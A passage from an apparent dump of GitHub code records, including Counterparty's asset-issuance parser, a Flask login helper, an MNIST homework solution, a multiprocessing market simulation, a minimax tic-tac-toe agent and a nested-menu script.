message_type.pack(LR_SUBASSET_ID)\n else: \n data = message_type.pack(SUBASSET_ID)\n \n if description == None and util.enabled(\"issuance_description_special_null\"):\n #a special message is created to be catched by the parse function\n curr_format = subasset_format + '{}s'.format(compacted_subasset_length) + '{}s'.format(len(DESCRIPTION_MARK_BYTE)+len(DESCRIPTION_NULL_ACTION))\n encoded_description = DESCRIPTION_MARK_BYTE+DESCRIPTION_NULL_ACTION.encode('utf-8')\n else: \n curr_format = subasset_format + '{}s'.format(compacted_subasset_length) + '{}s'.format(len(validated_description)) \n encoded_description = validated_description.encode('utf-8')\n \n if subasset_format_length <= 18:\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description)\n elif subasset_format_length <= 19:# param reset was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if reset else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description) \n elif subasset_format_length <= 20:# param lock was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description)\n\n if transfer_destination:\n destination_outputs = [(transfer_destination, None)]\n else:\n destination_outputs = []\n return (source, destination_outputs, data)\n\ndef parse (db, tx, message, message_type_id):\n issuance_parse_cursor = db.cursor()\n asset_format = 
util.get_value_by_block_index(\"issuance_asset_serialization_format\",tx['block_index'])\n asset_format_length = util.get_value_by_block_index(\"issuance_asset_serialization_length\",tx['block_index'])\n subasset_format = util.get_value_by_block_index(\"issuance_subasset_serialization_format\",tx['block_index'])\n subasset_format_length = util.get_value_by_block_index(\"issuance_subasset_serialization_length\",tx['block_index'])\n\n # Unpack message.\n try:\n subasset_longname = None\n if message_type_id == LR_SUBASSET_ID or message_type_id == SUBASSET_ID:\n if not util.enabled('subassets', block_index=tx['block_index']):\n logger.warn(\"subassets are not enabled at block %s\" % tx['block_index'])\n raise exceptions.UnpackError\n\n # parse a subasset original issuance message\n lock = None\n reset = None\n \n if subasset_format_length <= 18:\n asset_id, quantity, divisible, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length])\n elif subasset_format_length <= 19:# param reset was inserted\n asset_id, quantity, divisible, reset, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length]) \n elif subasset_format_length <= 20:# param lock was inserted\n asset_id, quantity, divisible, lock, reset, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length])\n \n description_length = len(message) - subasset_format_length - compacted_subasset_length\n if description_length < 0:\n logger.warn(\"invalid subasset length: [issuance] tx [%s]: %s\" % (tx['tx_hash'], compacted_subasset_length))\n raise exceptions.UnpackError\n messages_format = '>{}s{}s'.format(compacted_subasset_length, description_length)\n compacted_subasset_longname, description = struct.unpack(messages_format, message[subasset_format_length:])\n subasset_longname = util.expand_subasset_longname(compacted_subasset_longname)\n callable_, call_date, call_price = False, 0, 0.0\n try:\n description = description.decode('utf-8')\n except UnicodeDecodeError:\n description_data = description\n description = ''\n if description_data[0:1] == DESCRIPTION_MARK_BYTE:\n try:\n if description_data[1:].decode('utf-8') == DESCRIPTION_NULL_ACTION:\n description = None\n except UnicodeDecodeError:\n description = '' \n elif (tx['block_index'] > 283271 or config.TESTNET or config.REGTEST) and len(message) >= asset_format_length: # Protocol change.\n if (len(message) - asset_format_length <= 42) and not util.enabled('pascal_string_removed'):\n curr_format = asset_format + '{}p'.format(len(message) - asset_format_length)\n else:\n curr_format = asset_format + '{}s'.format(len(message) - asset_format_length)\n \n lock = None\n reset = None\n if (asset_format_length <= 19):# callbacks parameters were removed\n asset_id, quantity, divisible, lock, reset, description = struct.unpack(curr_format, message)\n callable_, call_date, call_price = False, 0, 0.0\n elif (asset_format_length <= 26):#the reset param didn't even exist\n asset_id, quantity, divisible, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n elif (asset_format_length <= 27):# param reset was inserted\n asset_id, quantity, divisible, reset, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n elif (asset_format_length <= 28):# param lock was inserted\n asset_id, quantity, divisible, lock, reset, callable_, call_date, call_price, description = struct.unpack(curr_format, message)\n \n call_price = round(call_price, 6) # 
TODO: arbitrary\n try:\n description = description.decode('utf-8')\n except UnicodeDecodeError:\n description_data = description\n description = ''\n if description_data[0:1] == DESCRIPTION_MARK_BYTE:\n try:\n if description_data[1:].decode('utf-8') == DESCRIPTION_NULL_ACTION:\n description = None\n except UnicodeDecodeError:\n description = '' \n else:\n if len(message) != LENGTH_1:\n raise exceptions.UnpackError\n asset_id, quantity, divisible = struct.unpack(FORMAT_1, message)\n lock, reset, callable_, call_date, call_price, description = False, False, False, 0, 0.0, ''\n try:\n asset = util.generate_asset_name(asset_id, tx['block_index'])\n \n ##This is for backwards compatibility with assets names longer than 12 characters\n if asset.startswith('A'):\n namedAsset = util.get_asset_name(db, asset_id, tx['block_index'])\n \n if (namedAsset != 0):\n asset = namedAsset\n \n if description == None:\n description = util.get_asset_description(db, asset)\n \n status = 'valid'\n except exceptions.AssetIDError:\n asset = None\n status = 'invalid: bad asset name'\n except exceptions.UnpackError as e:\n asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description = None, None, None, None, None, None, None, None, None\n status = 'invalid: could not unpack'\n\n # parse and validate the subasset from the message\n subasset_parent = None\n if status == 'valid' and subasset_longname is not None: # Protocol change.\n try:\n # ensure the subasset_longname is valid\n util.validate_subasset_longname(subasset_longname)\n subasset_parent, subasset_longname = util.parse_subasset_from_asset_name(subasset_longname)\n except exceptions.AssetNameError as e:\n asset = None\n status = 'invalid: bad subasset name'\n\n reissuance = None\n fee = 0\n if status == 'valid':\n call_date, call_price, problems, fee, description, divisible, lock, reset, reissuance, reissued_asset_longname = validate(db, tx['source'], tx['destination'], asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, block_index=tx['block_index'])\n\n if problems: status = 'invalid: ' + '; '.join(problems)\n if not util.enabled('integer_overflow_fix', block_index=tx['block_index']) and 'total quantity overflow' in problems:\n quantity = 0\n\n # Reset?\n if (status == 'valid') and reset and util.enabled(\"cip03\", tx['block_index']):\n balances_cursor = issuance_parse_cursor.execute('''SELECT * FROM balances WHERE asset = ? AND quantity > 0''', (asset,))\n balances_result = balances_cursor.fetchall()\n \n if len(balances_result) <= 1:\n if len(balances_result) == 0:\n issuances_cursor = issuance_parse_cursor.execute('''SELECT * FROM issuances WHERE asset = ? 
ORDER BY tx_index DESC''', (asset,))\n issuances_result = issuances_cursor.fetchall()\n \n owner_balance = 0\n owner_address = issuances_result[0]['issuer']\n else:\n owner_balance = balances_result[0][\"quantity\"]\n owner_address = balances_result[0][\"address\"]\n \n if owner_address == tx['source']:\n if owner_balance > 0:\n util.debit(db, tx['source'], asset, owner_balance, 'reset destroy', tx['tx_hash'])\n \n bindings = {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'source': tx['source'],\n 'asset': asset,\n 'quantity': owner_balance,\n 'tag': \"reset\",\n 'status': \"valid\",\n 'reset': True,\n }\n sql = 'insert into destructions values(:tx_index, :tx_hash, :block_index, :source, :asset, :quantity, :tag, :status)'\n issuance_parse_cursor.execute(sql, bindings)\n \n bindings= {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'asset': asset,\n 'quantity': quantity,\n 'divisible': divisible,\n 'source': tx['source'],\n 'issuer': tx['source'],\n 'transfer': False,\n 'callable': callable_,\n 'call_date': call_date,\n 'call_price': call_price,\n 'description': description,\n 'fee_paid': 0,\n 'locked': lock,\n 'status': status,\n 'reset': True,\n 'asset_longname': reissued_asset_longname,\n }\n \n sql='insert into issuances values(:tx_index, :tx_hash, 0, :block_index, :asset, :quantity, :divisible, :source, :issuer, :transfer, :callable, :call_date, :call_price, :description, :fee_paid, :locked, :status, :asset_longname, :reset)'\n issuance_parse_cursor.execute(sql, bindings)\n \n # Credit.\n if quantity:\n util.credit(db, tx['source'], asset, quantity, action=\"reset issuance\", event=tx['tx_hash'])\n\n else:\n if tx['destination']:\n issuer = tx['destination']\n transfer = True\n #quantity = 0\n else:\n issuer = tx['source']\n transfer = False\n\n # Debit fee.\n if status == 'valid':\n util.debit(db, tx['source'], config.XCP, fee, action=\"issuance fee\", event=tx['tx_hash'])\n\n # Lock?\n if not isinstance(lock,bool):\n lock = False\n if status == 'valid':\n if (description and description.lower() == 'lock') or lock:\n lock = True\n cursor = db.cursor()\n issuances = list(cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? 
AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset)))\n cursor.close()\n if description.lower() == 'lock' and len(issuances) > 0:\n description = issuances[-1]['description'] # Use last description\n\n if not reissuance:\n # Add to table of assets.\n bindings= {\n 'asset_id': str(asset_id),\n 'asset_name': str(asset),\n 'block_index': tx['block_index'],\n 'asset_longname': subasset_longname,\n }\n sql='insert into assets values(:asset_id, :asset_name, :block_index, :asset_longname)'\n issuance_parse_cursor.execute(sql, bindings)\n\n if status == 'valid' and reissuance:\n # when reissuing, add the asset_longname to the issuances table for API lookups\n asset_longname = reissued_asset_longname\n else:\n asset_longname = subasset_longname\n\n # Add parsed transaction to message-type–specific table.\n bindings= {\n 'tx_index': tx['tx_index'],\n 'tx_hash': tx['tx_hash'],\n 'block_index': tx['block_index'],\n 'asset': asset,\n 'quantity': quantity,\n 'divisible': divisible,\n 'source': tx['source'],\n 'issuer': issuer,\n 'transfer': transfer,\n 'callable': callable_,\n 'call_date': call_date,\n 'call_price': call_price,\n 'description': description,\n 'fee_paid': fee,\n 'locked': lock,\n 'reset': reset,\n 'status': status,\n 'asset_longname': asset_longname,\n }\n if \"integer overflow\" not in status:\n sql='insert into issuances values(:tx_index, :tx_hash, 0, :block_index, :asset, :quantity, :divisible, :source, :issuer, :transfer, :callable, :call_date, :call_price, :description, :fee_paid, :locked, :status, :asset_longname, :reset)'\n issuance_parse_cursor.execute(sql, bindings)\n else:\n logger.warn(\"Not storing [issuance] tx [%s]: %s\" % (tx['tx_hash'], status))\n logger.debug(\"Bindings: %s\" % (json.dumps(bindings), ))\n\n # Credit.\n if status == 'valid' and quantity:\n util.credit(db, tx['source'], asset, quantity, action=\"issuance\", event=tx['tx_hash'])\n\n issuance_parse_cursor.close()\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"CounterpartyXCP/counterparty-lib","sub_path":"counterpartylib/lib/messages/issuance.py","file_name":"issuance.py","file_ext":"py","file_size_in_byte":34118,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"20"} +{"seq_id":"5794782246","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\nimport os\nfrom flask import Response\n\nfrom utils import constant\n\n\ndef create_response(**kwargs) -> Response:\n \"\"\"\n Create response object\n If response is dict, use response to create Response\n If response is not None, use kwargs to create Response\n \"\"\"\n if kwargs is not None:\n return Response(json.dumps(dict(**kwargs)), mimetype='application/json')\n else:\n response = {\n 'code': 500,\n 'message': '内部错误'\n }\n return Response(json.dumps(response), mimetype='application/json')\n\n\ndef check_password(user, request) -> Response:\n \"\"\"Check user password and add token\"\"\"\n data = request.json\n headers = request.headers\n set_cookie = False\n r = {}\n username = ''\n if 'User-Agent' in headers.keys() and 'python' in headers['User-Agent']:\n if ('username' and 'password') in data.keys() and len(data.keys()) == 2:\n username = data['username']\n if user.is_user(username):\n if user.check_password(username, data['password']):\n r['message'] = '登录成功'\n r['code'] = 0\n set_cookie = True\n user.logger.info(f'用户 {username} 登陆成功')\n else:\n r['message'] = '密码错误'\n r['code'] = -1\n user.logger.info(f'尝试登陆的用户 {username} 密码错误')\n else:\n r['message'] = '用户不存在'\n r['code'] = 
-2\n user.logger.info(f'尝试登陆的用户名 {username} 不存在')\n else:\n r['message'] = 'Illegal client'\n r['code'] = -3\n else:\n r['message'] = 'Illegal client'\n r['code'] = -3\n response = create_response(**r)\n if set_cookie:\n token = user.session.create_token(username)\n response.set_cookie('session', token)\n user.logger.info(f'为用户 {username} 分配SessionToken {token}')\n return response\n\n\ndef make_log_backup():\n \"\"\"Create log backup on startup\"\"\"\n file_name = constant.LATEST_LOG_FILE\n if os.path.isfile(file_name):\n modify_time = time.strftime('%Y-%m-%d', time.localtime(\n os.stat(file_name).st_mtime))\n counter = 0\n while True:\n counter += 1\n new_file_name = '{}/{}-{}.log'.format(\n os.path.dirname(file_name), modify_time, counter)\n if not os.path.isfile(new_file_name):\n break\n os.rename(file_name, new_file_name)\n\n\ndef json_dumps(d: dict) -> str:\n return json.dumps(d, indent=4, ensure_ascii=False)\n\n\ndef time_fmt(t: int) -> str:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(t))\n","repo_name":"Andy-Archived-Projects/StudentLeaveSystem","sub_path":"server/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41001808909","text":"#!/usr/bin/env python\n# coding: -utf8\n\nif __name__ == '__main__':\n\n height = input(\"Enter your height(inch): \")\n height = float(height)\n\n weight = input(\"Enter your weight(pound): \")\n weight = float(weight)\n\n bmi = (weight / (height * height)) * 703\n bmi = ((bmi * 10) + 0.5) / 10.0\n\n print(\"Yor BMI is %.1f.\" % bmi)\n if bmi < 18.5:\n print(\"Yor are underweight. You should see your doctor.\")\n elif 18.5 <= bmi <= 25:\n print(\"Yor are whthin the ideal weight range.\")\n else:\n print(\"Yor are overweight. You should see your doctor.\")\n","repo_name":"ifukazoo/LanguageExercises","sub_path":"19_if-elseif/python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7285714656","text":"import numpy as np\nimport gzip\nimport struct\nimport sys\nsys.path.append('python/')\ntry:\n import needle as ndl\n import needle.ops as ops\nexcept:\n pass\n\n\ndef parse_mnist(image_filename, label_filename):\n \"\"\" Read an images and labels file in MNIST format. See this page:\n http://yann.lecun.com/exdb/mnist/ for a description of the file format.\n\n Args:\n image_filename (str): name of gzipped images file in MNIST format\n label_filename (str): name of gzipped labels file in MNIST format\n\n Returns:\n Tuple (X,y):\n X (numpy.ndarray[np.float32]): 2D numpy array containing the loaded \n data. The dimensionality of the data should be \n (num_examples x input_dim) where 'input_dim' is the full \n dimension of the data, e.g., since MNIST images are 28x28, it \n will be 784. Values should be of type np.float32, and the data \n should be normalized to have a minimum value of 0.0 and a \n maximum value of 1.0. The normalization should be applied uniformly\n across the whole dataset, _not_ individual images.\n\n y (numpy.ndarray[dtype=np.uint8]): 1D numpy array containing the\n labels of the examples. 
Values should be of type np.uint8 and\n for MNIST will contain the values 0-9.\n \"\"\"\n # BEGIN YOUR CODE\n with gzip.open(image_filename) as f:\n content = f.read()\n magic, length, row, column = struct.unpack(\">iiii\", content[:16])\n X = struct.unpack(\">\"+\"B\"*length*row*column, content[16:])\n X = np.array(X, dtype=np.float32).reshape(length, row*column)\n X = X/X.max()\n\n with gzip.open(label_filename) as f:\n content = f.read()\n magic, length = struct.unpack(\">ii\", content[:8])\n y = struct.unpack(\">\"+\"B\"*length, content[8:])\n y = np.array(y, dtype=np.uint8)\n\n return (X, y)\n\n # END YOUR CODE\n\n\ndef softmax_loss(Z, y_one_hot):\n \"\"\" Return softmax loss. Note that for the purposes of this assignment,\n you don't need to worry about \"nicely\" scaling the numerical properties\n of the log-sum-exp computation, but can just compute this directly.\n\n Args:\n Z (ndl.Tensor[np.float32]): 2D Tensor of shape\n (batch_size, num_classes), containing the logit predictions for\n each class.\n y (ndl.Tensor[np.int8]): 2D Tensor of shape (batch_size, num_classes)\n containing a 1 at the index of the true label of each example and\n zeros elsewhere.\n\n Returns:\n Average softmax loss over the sample. (ndl.Tensor[np.float32])\n \"\"\"\n # BEGIN YOUR SOLUTION\n batch_size = Z.shape[0]\n return ops.summation(ops.log(ops.summation(ops.exp(Z), axes=(1, )))\n - ops.summation(Z * y_one_hot, axes=(1, ))) / batch_size\n # END YOUR SOLUTION\n\n\ndef nn_epoch(X, y, W1, W2, lr=0.1, batch=100):\n \"\"\" Run a single epoch of SGD for a two-layer neural network defined by the\n weights W1 and W2 (with no bias terms):\n logits = ReLU(X * W1) * W2\n The function should use the step size lr, and the specified batch size (and\n again, without randomizing the order of X).\n\n Args:\n X (np.ndarray[np.float32]): 2D input array of size\n (num_examples x input_dim).\n y (np.ndarray[np.uint8]): 1D class label array of size (num_examples,)\n W1 (ndl.Tensor[np.float32]): 2D array of first layer weights, of shape\n (input_dim, hidden_dim)\n W2 (ndl.Tensor[np.float32]): 2D array of second layer weights, of shape\n (hidden_dim, num_classes)\n lr (float): step size (learning rate) for SGD\n batch (int): size of SGD mini-batch\n\n Returns:\n Tuple: (W1, W2)\n W1: ndl.Tensor[np.float32]\n W2: ndl.Tensor[np.float32]\n \"\"\"\n\n # BEGIN YOUR SOLUTION\n num_batches = int(np.ceil(y.shape[0] / batch))\n num_classes = W2.shape[1]\n\n for i in range(num_batches):\n batch_size = batch\n # the last batch\n if y.shape[0] < (i+1)*batch:\n batch_size = y.shape[0] - i*batch\n\n # X_selected is in (batch_size x input_dim)\n # y_selected is in (batch_size)\n X_selected = X[i*batch:i*batch+batch_size]\n y_selected = y[i*batch:i*batch+batch_size]\n\n # convert y_selected to one-hot matrix\n mask = np.zeros((batch_size, num_classes))\n mask[np.arange(batch_size), y_selected] = 1\n mask = ndl.Tensor(mask, requires_grad=False)\n\n X_selected = ndl.Tensor(X_selected)\n loss = softmax_loss(ops.matmul(\n ops.relu(ops.matmul(X_selected, W1)), W2), mask)\n loss.backward()\n W1_numpy, W2_numpy = W1.numpy(), W2.numpy()\n W1_grad, W2_grad = W1.grad.numpy(), W2.grad.numpy()\n # update parameters\n W1_numpy -= W1_grad*lr\n W2_numpy -= W2_grad*lr\n\n W1.data = ndl.Tensor(W1_numpy)\n W2.data = ndl.Tensor(W2_numpy)\n\n return W1, W2\n # END YOUR SOLUTION\n\n# CODE BELOW IS FOR ILLUSTRATION, YOU DO NOT NEED TO EDIT\n\n\ndef loss_err(h, y):\n \"\"\" Helper function to compute both loss and error\"\"\"\n y_one_hot = np.zeros((y.shape[0], 
h.shape[-1]))\n y_one_hot[np.arange(y.size), y] = 1\n y_ = ndl.Tensor(y_one_hot)\n return softmax_loss(h, y_).numpy(), np.mean(h.numpy().argmax(axis=1) != y)\n","repo_name":"zml72062/CMU-10-714","sub_path":"hw1/apps/simple_ml.py","file_name":"simple_ml.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70910763571","text":"import random\nimport multiprocessing\nimport time\n\nclass Home(multiprocessing.Process):\n def __init__(self, home_pipe, temperature_array):\n multiprocessing.Process.__init__(self)\n self.home_pipe = home_pipe\n self.temperature_array = temperature_array\n \n def run(self):\n while True:\n temperature = self.temperature_array[0]\n self.home_pipe.send((temperature,))\n time.sleep(1)\n \nclass Weather(multiprocessing.Process):\n def __init__(self, temperature_array):\n multiprocessing.Process.__init__(self)\n self.temperature_array = temperature_array\n \n def run(self):\n while True:\n temperature = random.uniform(10, 20)\n self.temperature_array[0] = temperature\n time.sleep(1)\n\nclass External(multiprocessing.Process):\n def __init__(self, event_q, event_coef):\n multiprocessing.Process.__init__(self)\n self.event_q = event_q\n self.event_coef = event_coef\n \n def run(self):\n while True:\n event = random.choice(['law', 'diplomatic_tension', 'social_unrest', 'fuel_shortage'])\n event_coef = 0\n if event == 'law':\n event_coef = random.uniform(-0.05, 0.05)\n elif event == 'diplomatic_tension':\n event_coef = random.uniform(-0.1, 0.1)\n elif event == 'social_unrest':\n event_coef = random.uniform(-0.2, 0.2)\n elif event == 'fuel_shortage':\n event_coef = random.uniform(-0.3, 0.3)\n self.event_q.put((event, event_coef))\n time.sleep(1)\n\nclass Market(multiprocessing.Process):\n def __init__(self, home_pipe, event_q, temperature_array):\n multiprocessing.Process.__init__(self)\n self.home_pipe = home_pipe\n self.event_q = event_q\n self.temperature_array = temperature_array\n self.energy_price = 0.17\n\n def run(self):\n while True:\n temperature, = self.home_pipe.recv()\n event, event_coef = self.event_q.get()\n if temperature != 0:\n energy_price = (0.99 * self.energy_price) + (0.001 * (1/temperature)) + (event_coef)\n else:\n energy_price = (0.99 * self.energy_price) + (event_coef)\n self.energy_price = energy_price\n print(f'Energy price: {energy_price}')\n time.sleep(1)\n\nif __name__ == '__main__':\n home_pipe, home_pipe_other = multiprocessing.Pipe()\n event_q = multiprocessing.Queue()\n temperature_array = multiprocessing.Array('f', [0])\n ###\n home_process = Home(home_pipe, temperature_array)\n home_process.start()\n\n ###\n weather_process = Weather(temperature_array)\n weather_process.start()\n\n ###\n event_coef = 0.01\n external_process = External(event_q, event_coef)\n external_process.start()\n\n ###\n market_process = Market(home_pipe_other, event_q, temperature_array)\n market_process.start()\n\n\n","repo_name":"baptisteParpette/The-Energy-Market-PCC","sub_path":"dimanche/projet_final/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28653530602","text":"def solution(A,B):\n answer = 0\n result1=0\n result2=0\n A.sort(reverse= True)\n B.sort()\n for i in range(len(A)):\n result1+=A[i]*B[i]\n result2+=A[i]*B[len(A)-i-1]\n if result1 >result2:\n return result2\n else:\n return 
result1","repo_name":"bellday/Baekjoon","sub_path":"프로그래머스/lv2/12941. 최솟값 만들기/최솟값 만들기.py","file_name":"최솟값 만들기.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"32484257378","text":"\nimport time\n\nimport json\n\nfrom numpy import nan_to_num\nfrom numpy import mean\n\ndef update_config(dir):\n with open(\"update.json\",'r') as uc:\n config=json.load(uc)\n with open(\"config.json\",'r') as oc:\n origin_config=json.load(oc)\n \n for k,v in config.items():\n origin_config[k]=v\n with open(\"{}/config.json\".format(dir),'w') as wf:\n json.dump(origin_config,wf,indent=4)\n\n\ndef generate_ip_table(int_ips,mode,N):\n if mode=='remote':\n ip_tables=[]\n if N>len(int_ips):\n raise Exception(f'size of instances error, {N},{len(int_ips)}')\n ip_tables=[f'{ip}\\n' for ip in int_ips[:N]]\n with open(\"ips.txt\",'w') as wf:\n wf.writelines(ip_tables)\n else:\n with open(\"ips.txt\",'w') as wf:\n wf.writelines([f'127.0.0.1\\n' for _ in range(N)])\n \n\n\n\n \n\n\ndef Analyze(config_dir,result_dir,log,N):\n txs=0\n fp=open(\"{}/{}\".format(result_dir, log))\n timelist=[]\n latencys=[]\n blocks=0\n stat={}\n alg=\"\"\n id=''\n for line in iter(fp):\n if \"consensus\" in line:\n id=line.split()[-3]\n alg=line.split(':')[-1]\n if \"committed\" in line:\n a=line.split(' ')[1]+'-'+line.split(' ')[2].split('.')[0]\n st=time.mktime(time.strptime(a,\"%Y/%m/%d-%H:%M:%S\"))\n timelist.append(st)\n commitedtx=line.split(':')[5][:-6]\n txs+=int(commitedtx)\n if int(commitedtx)==0:\n continue\n blocks+=1\n if \"latency\" in line:\n latencys.append(nan_to_num(float(line.split(' ')[-2])))\n if len(timelist)<1:\n print(\"there is no valid log\")\n return None\n duration=timelist[-1]-timelist[0]\n stat['id']=id\n stat['algorithm']=alg[:-1]\n stat['running time(s)']=duration\n stat['txs']=txs\n stat['tps(tx/s)']=int(txs/duration)\n stat['average latency(ms)']=mean(latencys)\n stat['replicas']=N\n print(json.dumps( stat,indent=2))\n stat['latencys']=str(latencys)\n return stat","repo_name":"tncheng/multipipelinehs","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37940925068","text":"from tic_tac_toe.Board import Board, EMPTY, WIN, LOSE, NEUTRAL\n\n\nclass MinMaxAgent:\n cache = {}\n\n def __init__(self):\n self.side = None\n self.result = NEUTRAL\n\n def new_game(self, side):\n self.side = side\n self.result = NEUTRAL\n\n def final_result(self, sess, result):\n self.result = result\n\n def is_trainable(self):\n return False\n\n def _min(self, board):\n # board.print_board()\n board_hash = board.hash_value()\n if board_hash in self.cache:\n return self.cache[board_hash]\n\n winner = board.check_win()\n if winner == self.side:\n return 1, -1\n elif winner == board.other_side(self.side):\n return 0, -1\n\n min = 0.5 # 0.5 means DRAW\n action = -1\n\n for index in [i for i, e in enumerate(board.state) if board.state[i] == EMPTY]:\n b = Board(board.state)\n b.move(index, board.other_side(self.side))\n\n res, _ = self._max(b)\n if res < min or action == -1:\n min = res\n action = index\n if min == 0:\n self.cache[board_hash] = (min, action)\n return min, action\n\n self.cache[board_hash] = (min, action)\n return min, action\n\n def _max(self, board):\n # board.print_board()\n board_hash = board.hash_value()\n if board_hash in self.cache:\n return self.cache[board_hash]\n\n 
winner = board.check_win()\n if winner == self.side:\n return 1, -1\n elif winner == board.other_side(self.side):\n return 0, -1\n\n max = 0.5 # 0.5 means DRAW\n action = -1\n\n for index in [i for i, e in enumerate(board.state) if board.state[i] == EMPTY]:\n b = Board(board.state)\n b.move(index, self.side)\n\n res, _ = self._min(b)\n if res > max or action == -1:\n max = res\n action = index\n if max == 1:\n self.cache[board_hash] = (max, action)\n return max, action\n\n self.cache[board_hash] = (max, action)\n return max, action\n\n def move(self, sess, board):\n score, action = self._max(board)\n _, res, finished = board.move(action, self.side)\n return res, finished\n","repo_name":"fcarsten/ai_playground","sub_path":"tic_tac_toe/MinMaxAgent.py","file_name":"MinMaxAgent.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14661802261","text":"#!/usr/bin/env python \n__author__ = \"lrtao2010\" \n\n#数据结构:\nmenu = {\n '北京':{\n '海淀':{\n '五道口':{\n 'soho':{},\n '网易':{},\n 'google':{}\n },\n '中关村':{\n '爱奇艺':{},\n '汽车之家':{},\n 'youku':{},\n },\n '上地':{\n '百度':{},\n },\n },\n '昌平':{\n '沙河':{\n '老男孩':{},\n '北航':{},\n },\n '天通苑':{},\n '回龙观':{},\n },\n '朝阳':{},\n '东城':{},\n },\n '上海':{\n '闵行':{\n \"人民广场\":{\n '炸鸡店':{}\n }\n },\n '闸北':{\n '火车站':{\n '携程':{}\n }\n },\n '浦东':{},\n },\n '山东':{},\n}\n\n# for city_name in enumerate(menu.keys()):\n# print(city_name[0],city_name[1])\n# des_city = int(input(\"请选择想要去往的省/直辖市(0|1|2): \"))\n# if des_city == 0:\n# for area_name in enumerate(menu.get(\"北京\")):\n# print(area_name[0],area_name[1])\n# des_area = int(input(\"请选择想要去往的市区(0|1|2|3): \"))\n# if des_area == 0:\n# print(menu.get(\"北京\").get(\"海淀\"))\n# elif des_city == 1:\n# print(2)\n# else:\n# print(3)\n\n# level =[]\n# while True:\n# for key in menu:\n# print(key)\n# your_choice = input(\"your choice >>:\").strip()\n# if your_choice == \"b\":\n# if len(level) == 0:break #当列表空的时候,就是退出大循环的时候\n# menu=level[-1]\n# level.pop() #删除列表最后一个元素,\n# print(level)\n# # break\n# elif your_choice in menu:\n# # print(menu)\n# level.append(menu)\n# # print(level)\n# menu=menu[your_choice]\n# else:\n# continue\n\nif __name__ == '__main__':\n current_layer = menu\n parent_layer = [] #将父级key值放入到列表中\n flags = False #设置标志位\n while not flags:\n for key in current_layer:\n print(key)\n choose = input(\"请选择,输入b返回上一级菜单,输入q退出菜单:\").strip()\n if choose in current_layer:\n parent_layer.append(current_layer) #将当前的状态放入列表中\n current_layer = current_layer[choose]\n elif choose == 'b':\n if parent_layer:\n current_layer = parent_layer.pop()\n elif choose == 'q':\n flags = True\n else:\n print(\"\\033[34;1m输入有误,请重新输入\\033[0m\")","repo_name":"lrtao2017/pythonqzs3","sub_path":"app/task/menu/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72986528688","text":"import requests\n\n\nplatform = {\n 'name': '比艺直播',\n 'id': '13',\n 'img': 'http://1.pic.pc6.com/thumb/up/2017-4/20174178394129036233_160_160.png'\n}\n\n\nclass Router(object):\n def __init__(self):\n self.url = \"http://www.17biyi.cn/biyi-api/biyi/live/getHotRoomList\"\n self.data = 
